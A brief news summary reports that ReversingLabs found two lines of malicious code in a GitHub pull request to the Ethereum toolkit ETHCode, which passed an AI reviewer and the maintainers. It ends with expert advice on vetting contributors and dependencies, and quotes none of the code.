Cybersecurity firm ReversingLabs discovered two lines of malicious code in an update for ETHCode, an open-source toolkit used by Ethereum developers. This malicious code was hidden in a GitHub pull request that contained 43 commits and 4,000 lines, which primarily aimed to include a new testing framework. The update was submitted on June 17 by a user with no previous contributions. Despite passing checks from GitHub’s AI reviewer and the ETHCode creators, the malicious code could potentially allow hackers to steal crypto assets or compromise Ethereum contracts. Even though there is no evidence that the malicious code was actively used to steal tokens, its presence raises concerns about the vulnerability of open-source projects in the crypto industry, where developers often install packages without sufficient scrutiny. Experts emphasize the necessity for verifying contributor identities and reviewing dependencies, as the tendency to assume safety based on a package's popularity can lead to exploitation. Developers are advised to use tools to identify suspicious behavior in code and to isolate sensitive programs from development environments to enhance security.

Source 🔗